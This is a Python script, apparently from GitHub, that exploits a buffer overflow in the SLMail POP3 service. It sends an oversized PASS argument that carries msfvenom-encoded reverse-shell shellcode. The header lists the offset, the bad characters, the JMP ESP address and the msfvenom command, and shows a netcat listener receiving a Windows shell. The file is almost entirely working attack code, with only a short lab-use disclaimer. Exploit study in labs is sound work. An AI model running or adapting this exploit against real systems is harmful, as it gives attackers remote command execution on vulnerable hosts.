exploit-slmail.py
#!/usr/bin/python
#
# July 2017 | github.com/rafaveira3
#
# Exploit SLMail - Buffer Overflow
#
# How I tested it:
# - 1 Kali attacking machine and 1 Windows XP (Metasploitable will do) in the same local host network using virtualbox.
# - Download and install vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# https://www.exploit-db.com/apps/12f1ab027e5374587e7e998c00682c5d-SLMail55_4433.exe
# - Installation Guide: Next, Next, Next, ... , Next, Finish
# - pattern_create.rb and pattern_offset.rb = 2606
# - Badchars = \x00\x0a\x0d
# - Return Address found at 5F4A358F (JMP ESP)
# - Generated the payload using msfvenom
#
# PoC:
# terminal 1
# root@kali: python exploit-smail.py
# terminal 2
# root@kali: nc -nlvp 443
# listening on [any] 443 ...
# connect to [10.10.0.20] from (UNKNOWN) [10.10.0.21] 1035
# Microsoft Windows XP [versão 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Arquivos de programas\SLmail\System>
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
#
import socket
# Python 2 script (print statement; str literals are byte strings sent as-is).
# The socket is created at import time and is never closed on any code path.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# The header's return address (5F4A358F) written byte-reversed, i.e. little-endian.
jmpESP = "\x8f\x35\x4a\x5f"
# 16-byte NOP sled (0x90) placed between the return address and the payload.
nop = "\x90"*16
#
# msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.0.20 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
# Payload size: 351 bytes
# 23 lines of 15 bytes plus a final line of 6 = 351, matching the size noted above.
# The LHOST/LPORT baked into the payload match the nc listener in the header's PoC.
shellcode = ("\xbf\xbc\xfc\x4b\xdd\xdb\xd5\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x52\x31\x7a\x12\x03\x7a\x12\x83\x7e\xf8\xa9\x28\x82\xe9\xac"
"\xd3\x7a\xea\xd0\x5a\x9f\xdb\xd0\x39\xd4\x4c\xe1\x4a\xb8\x60"
"\x8a\x1f\x28\xf2\xfe\xb7\x5f\xb3\xb5\xe1\x6e\x44\xe5\xd2\xf1"
"\xc6\xf4\x06\xd1\xf7\x36\x5b\x10\x3f\x2a\x96\x40\xe8\x20\x05"
"\x74\x9d\x7d\x96\xff\xed\x90\x9e\x1c\xa5\x93\x8f\xb3\xbd\xcd"
"\x0f\x32\x11\x66\x06\x2c\x76\x43\xd0\xc7\x4c\x3f\xe3\x01\x9d"
"\xc0\x48\x6c\x11\x33\x90\xa9\x96\xac\xe7\xc3\xe4\x51\xf0\x10"
"\x96\x8d\x75\x82\x30\x45\x2d\x6e\xc0\x8a\xa8\xe5\xce\x67\xbe"
"\xa1\xd2\x76\x13\xda\xef\xf3\x92\x0c\x66\x47\xb1\x88\x22\x13"
"\xd8\x89\x8e\xf2\xe5\xc9\x70\xaa\x43\x82\x9d\xbf\xf9\xc9\xc9"
"\x0c\x30\xf1\x09\x1b\x43\x82\x3b\x84\xff\x0c\x70\x4d\x26\xcb"
"\x77\x64\x9e\x43\x86\x87\xdf\x4a\x4d\xd3\x8f\xe4\x64\x5c\x44"
"\xf4\x89\x89\xcb\xa4\x25\x62\xac\x14\x86\xd2\x44\x7e\x09\x0c"
"\x74\x81\xc3\x25\x1f\x78\x84\x43\xea\x82\x40\x3c\xe8\x82\x69"
"\x07\x65\x64\x03\x67\x20\x3f\xbc\x1e\x69\xcb\x5d\xde\xa7\xb6"
"\x5e\x54\x44\x47\x10\x9d\x21\x5b\xc5\x6d\x7c\x01\x40\x71\xaa"
"\x2d\x0e\xe0\x31\xad\x59\x19\xee\xfa\x0e\xef\xe7\x6e\xa3\x56"
"\x5e\x8c\x3e\x0e\x99\x14\xe5\xf3\x24\x95\x68\x4f\x03\x85\xb4"
"\x50\x0f\xf1\x68\x07\xd9\xaf\xce\xf1\xab\x19\x99\xae\x65\xcd"
"\x5c\x9d\xb5\x8b\x60\xc8\x43\x73\xd0\xa5\x15\x8c\xdd\x21\x92"
"\xf5\x03\xd2\x5d\x2c\x80\xe2\x17\x6c\xa1\x6a\xfe\xe5\xf3\xf6"
"\x01\xd0\x30\x0f\x82\xd0\xc8\xf4\x9a\x91\xcd\xb1\x1c\x4a\xbc"
"\xaa\xc8\x6c\x13\xca\xd8")
# Buffer layout, left to right: 2606 bytes of "A" filler (the pattern_offset
# value from the header), the 4-byte return address, the 16-byte NOP sled, the
# 351-byte payload, then "C" padding so the total is exactly 3500 bytes
# (3500 - 2606 - 4 - 351 - 16 = 523). Note that the name shadows the Python 2
# builtin `buffer`.
buffer = "A"*2606 + jmpESP + nop + shellcode + "C"*(3500-2606-4-351-16)
try:
    print "\nSending evil buffer..."
    # Target host and POP3 port are hard-coded to the header's lab address.
    s.connect(('10.10.0.21',110))
    # The server banner and the USER reply are read but never inspected.
    data = s.recv(1024)
    s.send('USER username' +'\r\n')
    data = s.recv(1024)
    # The overflow is delivered as the PASS argument: a single line of roughly
    # 3.5 KB. From a monitoring standpoint, that oversized PASS argument is the
    # on-the-wire artifact a POP3 inspection rule would key on.
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except:
    # Bare except: every failure (connect, recv, send, even KeyboardInterrupt)
    # is reported as a connection problem, and the socket is never closed.
    print "Could not connect to POP3!"